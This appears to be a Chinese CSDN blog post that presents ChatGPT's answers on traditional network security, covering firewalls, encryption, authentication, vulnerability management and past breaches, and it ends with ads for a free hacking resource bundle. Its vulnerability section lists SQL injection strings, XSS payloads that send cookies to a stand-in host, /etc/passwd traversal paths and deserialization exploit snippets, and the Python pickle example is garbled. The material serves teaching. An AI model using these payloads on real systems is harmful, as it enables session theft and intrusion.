ChatGPT:你真的了解网络安全吗?浅谈攻击防御进行时之传统的网络安全

发布时间:2023年12月21日

ChatGPT(全名:Chat Generative Pre-trained Transformer),美国OpenAI 研发的聊天机器人程序,是人工智能技术驱动的自然语言处理工具。

在这里插入图片描述 基于其语言模型庞大、可控制、具有高度扩展性的特点,本文通过对话ChatGPT,浅谈网络安全攻击防御进行时。

传统的网络安全

在这里插入图片描述 提问ChatGPT:什么是传统的网络安全,主要包括哪些方面? ChatGPT回答如下:

传统的网络安全主要是指对计算机网络系统的保护和防御措施,
以保护计算机网络不受攻击、破坏或窃取敏感数据。

基于对网络安全领域的普遍理解和实践,传统的网络安全主要包括以下方面:

  1. 防火墙

威胁:入侵、木马、病毒等恶意攻击。黑客可能会通过漏洞或社交工程等手段突破防火墙,并在系统内部进行攻击和篡改。

2013年,美国零售巨头塔吉特公司(Target)的网络系统遭到黑客攻击,导致近700万张信用卡数据泄露。调查结果表明,黑客是通过一名供应商的帐号登录了塔吉特公司的网络,然后利用漏洞绕过了防火墙,最后成功入侵系统,窃取大量敏感数据。

防范措施:加强防火墙的安全性和可靠性,包括设置复杂密码、定期更新软件等措施。此外,也可以采用 IPS、IDS 等高级安全设备对网络流量进行深度筛查,及时发现和阻断潜在的攻击行为。

  1. 加密技术

威胁:数据泄露、窃取和篡改等。黑客可能会通过截获数据包、恶意软件等方式窃取加密数据,并对其进行篡改。

2017年,全球最大的金融机构之一的美国信用报告公司Equifax遭受了历史上最大的数据泄露事件之一,超过1.43亿人的个人信息和社会安全号码被盗。事件调查发现,黑客利用了一个已知漏洞,从而绕过了Equifax的加密机制,获取了大量的敏感数据。

前有些加密算法已经被广泛认为是不安全的或容易受到攻击,例如:

MD5:MD5是一种常用的哈希算法,但它已经被证明存在严重的弱点和碰撞攻击,并且不再适合用于安全敏感的应用程序中。

SHA-1:SHA-1也是一种常见的哈希算法,但它已经被证明存在严重的碰撞攻击和安全问题,并且已经被推荐不再使用。

RC4:RC4是一种对称加密算法,曾在许多应用程序中广泛使用。但是,它被证明存在严重的安全问题,并且被建议不再使用。

防范措施:采用更加安全的加密算法和密钥管理机制,同时也需要对加密协议进行随机性、不可预测性和完整性验证。此外,采用数字证书认证等技术,确保通信双方的身份真实和信息安全。

在这里插入图片描述

  1. 认证与授权

威胁:密码破解、伪造身份等。黑客可能会通过暴力破解、社交工程、钓鱼等方式获取合法用户的账号密码和身份证明,从而进行未授权访问。

2018年,Facebook 遭到了一次大规模的黑客攻击,影响到了超过5000万用户的账户。黑客利用一个代码漏洞,盗用了大量的访问令牌,从而获取了用户的个人信息和私密消息。这次事件直接暴露了 Facebook 认证机制的漏洞,也引起了人们对社交媒体隐私的关注。

防范措施:采用更加安全和复杂的密码策略和认证机制,如多因素身份验证等。此外,也需要实行严格的访问控制和审计机制,避免未授权访问和恶意行为。

  1. 漏洞管理

威胁:黑客可能利用系统漏洞进行攻击和渗透。

2019年,美国政府网络安全机构 NSA 发布了一份警告,称黑客组织正在利用漏洞攻击一些受害者的 VPN 门户。这些攻击活动被称为“Pulse Secure VPN”攻击,黑客利用了特定版本 VPN 的漏洞,以获取管理员授权、执行代码和窃取敏感数据等。

SQL注入常见攻击方式:

select * from users where name='qiu' or 1=1 # and password='xxx'

select * from user where name='qiu' or 1=1 #' and pass=''

SELECT * FROM users WHERE id=1 AND 1=(SELECT COUNT(*) FROM users GROUP BY CONCAT_WS(':', username, password));

SELECT * FROM users WHERE name='输入的用户名';

SELECT * FROM users WHERE name='' CONVERT(int, (SELECT TOP 1 password_hash FROM users)) 
-- ';

SELECT * FROM users WHERE username = 'qiu'--'  AND password = 'xx'

SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM users) > 0

SELECT * FROM users WHERE username='admin' UNION SELECT credit_card_number, expiration_date FROM credit_cards

SELECT * FROM users WHERE username='admin' UNION SELECT NULL,NULL,NULL FROM information_schema.tables --

xss常见攻击方式:

基础PAYLOAD:

<script>alert('XSS')</script>

直接弹出一个提示框


图片加载PAYLOAD:

<img src=x onerror="alert('XSS!')">

当加载这个图片时,会触发一段恶意脚本


链接跳转PAYLOAD:

<a href="javascript:alert('XSS')">点击我</a>

当用户点击链接时,会执行其中的脚本


Cookie盗取PAYLOAD:

<script>new Image().src="http://xx.com/steal.php?cookie="+document.cookie;</script>

将用户的Cookie信息发送到远程服务器


跳转到假登录页面PAYLOAD:

 <script>document.location="http://xx.com/login.php?user="+document.cookie;</script>

伪装成登录页面欺骗用户提交用户名和密码


文件包含常见攻击方式:

相对路径Payload:一些应用程序可能允许用户输入一个相对路径,攻击者可以使用“…/”等相对路径限制符,访问应用程序目录之外的文件。

../etc/passwd(将会列出除root以外的所有Linux用户信息)

绝对路径Payload:攻击者可以使用绝对路径访问系统中的文件,如 /etc/passwd 等。

NULL字节Payload:有些应用程序在处理文件名时,只识别空字节之前的字符,而忽略后面的内容。因此,攻击者可以将 “%00” 或 “\0”(空字符)添加到文件名中,欺骗应用程序只访问他们指定的文件。

../../../../../../../../../../etc/passwd%00

PHP伪协议Payload:如果应用程序使用PHP作为服务器端脚本解释器,攻击者可以使用PHP伪协议访问远程文件。

  php://filter/convert.base64-encode/resource=../../../etc/passwd

其他协议Payload:除了php协议,攻击者还可以使用其他协议来读取远程文件,比如 file , ftp 等。

file:///etc/passwd


序列化反序列化常见攻击方式: Java利用Payload:Java中常见的序列化和反序列化攻击方式是使用 ObjectInputStream 类进行攻击,攻击者可以构造一个包含恶意代码的序列化对象,例如:

public class Exploit implements Serializable {
  public Exploit() throws Exception {
    Runtime.getRuntime().exec("calc.exe");
    }
 }

然后将该对象序列化并通过网络发送到目标应用程序中,运行该序列化对象时就会执行恶意代码(在本例中是打开计算器)。

PHP 利用Payload:PHP中常见的序列化和反序列化攻击方式是使用 unserialize 函数来执行任意代码,攻击者可以构造一个包含恶意代码的序列化字符串,例如:

O:6:"Exploit":0:{}

当应用程序使用 unserialize 函数解析该字符串时,就会执行恶意代码。

Python 利用Payload:Python中支持使用 pickle 模块对对象进行序列化和反序列化,攻击者可以构造一个恶意代码并使用 pickle.dump 将其序列化,例如:

import os
class Exploit(object):
def reduce(self):
return (os.system,('calc.exe',))

然后将序列化后的恶意代码发送到目标系统中,使用 pickle.load 可以执行这个恶意代码。


防范措施:建立和实施完善的漏洞管理制度,及时发现和修补系统中的漏洞。同时,也需要定期进行漏洞扫描和评估,确保系统的安全性和稳定性。

  1. 安全策略

威胁:安全策略不完善、执行不到位等因素可能导致系统被黑客攻击和入侵。

2007年,中国移动曾因为短信群发功能易被利用进行违法行为而被罚款,这直接暴露出其安全策略存在缺陷和漏洞。此后,中国移动加强了对短信平台的监管和管理,并加强了电子认证及授权方面的技术和应用,提高了对违法行为的识别和预防能力。

防范措施:建立健全的安全策略和规则,包括网络访问控制、数据备份、应急响应等方面。同时,也需要加强对员工的培训和意识教育,提高他们的安全意识和能力,减少人为因素对系统安全性的影响。

提问ChatGPT:传统网络安全的侧重点在于什么? ChatGPT回答如下: 在这里插入图片描述

传统的网络安全措施重点在于抵御来自外部的攻击和威胁,以保障计算机网络的安全性和稳定性。但是,随着数字化时代的快速发展和信息化程度不断提高,网络安全面临着越来越多的挑战和新型威胁。


总结

以上为浅谈攻击防御进行时之传统的网络安全。

关注我,遇见攻击新姿势,吸纳网安新知识。

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享🎁

😝朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,可以扫描下方二维码免费领取
点击链接也可直接获取 CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
在这里插入图片描述

1??零基础入门

① 学习路线

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

img

② 路线对应学习视频

同时每个成长路线对应的板块都有配套的视频提供:

img

因篇幅有限,仅展示部分资料

2??视频配套资料&国内外网安书籍、文档

① 文档和书籍资料

img

② 黑客技术

img

因篇幅有限,仅展示部分资料

3??网络安全源码合集+工具包

img

4??网络安全面试题

面试题
上述所有资料 ?? ,朋友们如果有需要全套 📦《网络安全入门+进阶学习资源包》,可以扫描下方二维码免费领取 🆓
点击链接也可直接获取 CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享
在这里插入图片描述

文章来源:https://blog.csdn.net/mate1357/article/details/135125351
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。